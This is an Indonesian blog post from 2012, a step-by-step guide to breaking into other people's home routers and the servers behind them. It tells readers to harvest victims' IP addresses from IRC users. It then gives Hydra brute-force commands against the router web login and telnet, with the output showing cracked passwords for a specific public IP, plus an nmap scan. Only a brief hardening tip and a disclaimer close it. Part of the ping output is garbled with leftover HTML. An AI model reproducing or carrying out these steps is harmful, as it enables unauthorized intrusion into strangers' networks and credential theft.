Pages

Wednesday, November 28, 2012

CARA HACK PASSWORD ROUTER DENGAN HYDRA

salam streeters..

kali ini kita akan jabarkan cara mendapatkan username dan password router dengan hydra.



Apakah anda suka cari target di IRC untuk dihack router speedy atau di PC dibelakang router untuk pentest? Apakah anda masih mengandalkan target yang mengandalkan router speedy dengan keamanan password default yaitu user admin dan password admin ? Kalau anda masih mengandalkan metode serangan password default, maka disini penulis akan memberikan metode tambahan untuk anda yaitu metode brute force.

Disini penulis menggunakan tool Hydra. Hydra adalah tool untuk melakukan hacking password dengan menggunakan metode brute force, dengan anda memiliki kamus kata yang banyak yang dimungkinkan passwordnya ada di dalam kamus tersebut.

Di sini penulis contohkan misal kita join ke mIRC, kita contohkan saja nick ce_imutbgtt, nah whois aja itu nick dan kita akan mendapatkan IPnya.

atau bisa juga kita mengetahui IP router kita dengan cek arp-a misal router LAN 192.168.1.1 atau check IP public di checkmyip.com



Setelah kita dapatkan IPnya maka jalankan saja di browser IP address tersebut.



Setelah dijalankan http://180.254.70.135 maka akan tampil form window seperti dibawah ini



Jika menggunakan username admin dan password admin hasilnya adalah gagal maka anda akan dihadapkan pada 2 hal, terus maju atau tinggalkan target.

Jika anda ingin terus maju maka anda dapat menggunakan teknik brute force. Contohnya untuk melakukan exploitasi dengan hydra adalah

H:\hydra>hydra -m / -l admin -P data.txt 180.254.70.135 http-get

Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.

Hydra (http://www.thc.org ) starting at 2011-10-17 14:27:56

[DATA] 11 tasks, 1 servers, 11 login tries (l:1/p:11), ~1 tries per task

[DATA] attacking service http-get on port 80

[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)

[80][www] host: 180.254.70.135   login: admin   password: baseball

Hydra (http://www.thc.org ) finished at 2011-10-17 14:27:57

H:\hydra>

Setelah kita masuk ke router dengan password yang didapat, jika kita ingin melakukan hacking server di belakang router maka kita dapat melakukan IP Forwarding dari router ke Server yang berada dibelakang router.



Disini kita tidak tahu IP-IP lokal berapa saja dibelakang router, karena itu kita dapat mengujinya satu persatu dengan melakukan ping walaupun tidak jaminan.

Disini diasumsikan IP Servernya adalah 192.168.1.2 setelah kita ping dapat.

D:\>ping 180.254.70.135

Pinging 180.254.70.135 with 32 bytes of data:

Reply from 180.254.70.135: bytes=32 time<1ms data-blogger-escaped-180.254.70.135:="180.254.70.135:" data-blogger-escaped-bytes="32" data-blogger-escaped-c:="c:" data-blogger-escaped-dapat="dapat" data-blogger-escaped-dengan="dengan" data-blogger-escaped-diping="diping" data-blogger-escaped-from="from" data-blogger-escaped-jalan="jalan" data-blogger-escaped-kita="kita" data-blogger-escaped-maka="maka" data-blogger-escaped-melakukan="melakukan" data-blogger-escaped-mencoba="mencoba" data-blogger-escaped-ms="ms" data-blogger-escaped-nmap="nmap" data-blogger-escaped-reply="reply" data-blogger-escaped-scanning="scanning" data-blogger-escaped-setelah="setelah" data-blogger-escaped-time="time" data-blogger-escaped-ttl="254">nmap -v -A 180.254.70.135

Starting Nmap 5.21 ( http://nmap.org  ) at 2011-10-17 15:28 Pacific Daylight Time

NSE: Loaded 36 scripts for scanning.

Initiating Ping Scan at 15:28

Scanning 180.254.70.135 [4 ports]

Completed Ping Scan at 15:28, 0.53s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 15:28

Completed Parallel DNS resolution of 1 host. at 15:28, 3.09s elapsed

Initiating SYN Stealth Scan at 15:28

Scanning 180.254.70.135 [1000 ports]

Discovered open port 23/tcp on 180.254.70.135

Discovered open port 80/tcp on 180.254.70.135

Discovered open port 3389/tcp on 180.254.70.135

Discovered open port 21/tcp on 180.254.70.135

Completed SYN Stealth Scan at 15:28, 2.34s elapsed (1000 total ports)

Disini dari scanning dengan NMAP kita mendapatkan adanya port 23 yaitu port untuk telnet server. Dengan aktifnya Telnet Server maka kita dapat melakukan brute force ke server Telnet dengan Hydra.

H:\hydra>hydra -l administrator -P data.txt 180.254.70.135 telnet

Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.

Hydra (http://www.thc.org ) starting at 2011-10-17 15:21:22

[DATA] 6 tasks, 1 servers, 6 login tries (l:1/p:6), ~1 tries per task

[DATA] attacking service telnet on port 23

[STATUS] attack finished for 180.254.70.135 (waiting for childs to finish)

[23][telnet] host: 180.254.70.135   login: administrator   password: sepakbola

Hydra (http://www.thc.org ) finished at 2011-10-17 15:21:26

Binggo, kita mendapatkan password telnetnya.

Masukkan login dan passwordnya dan kita akan mendapatkan shell dari telnet server. Contohnya :



Setelah kita klik Open. Masukkan login dan passwordnya.



Binggo, kita masuk ke shell server. :D

Untuk download Hydra. http://0xa.li/files/hydra-6.0-windows.zip . Untuk cari kamusnya untuk brute force dapat dicari sendiri di google, jika ingin buat sendiri juga boleh. Cayooo!

Pengamanannya jika anda ingin tetap dapat dipanggil router speedynya dari luar, maka anda dapat membuat password yang susah ditebak dengan berbagai kombinasi huruf dan angka yang kompleks tapi tetap mudah diingat. Jika ingin lebih aman lagi ya tidak perlu membuat router speedy bisa diakses dari internet, caranya misal dengan melempar port 80 ke IP lain yang kosong atau tidak dipakai.

Saya tidak bertanggung sama sekali atas semua hal-hal yang diakibatkan oleh artikel ini.<!--1ms-->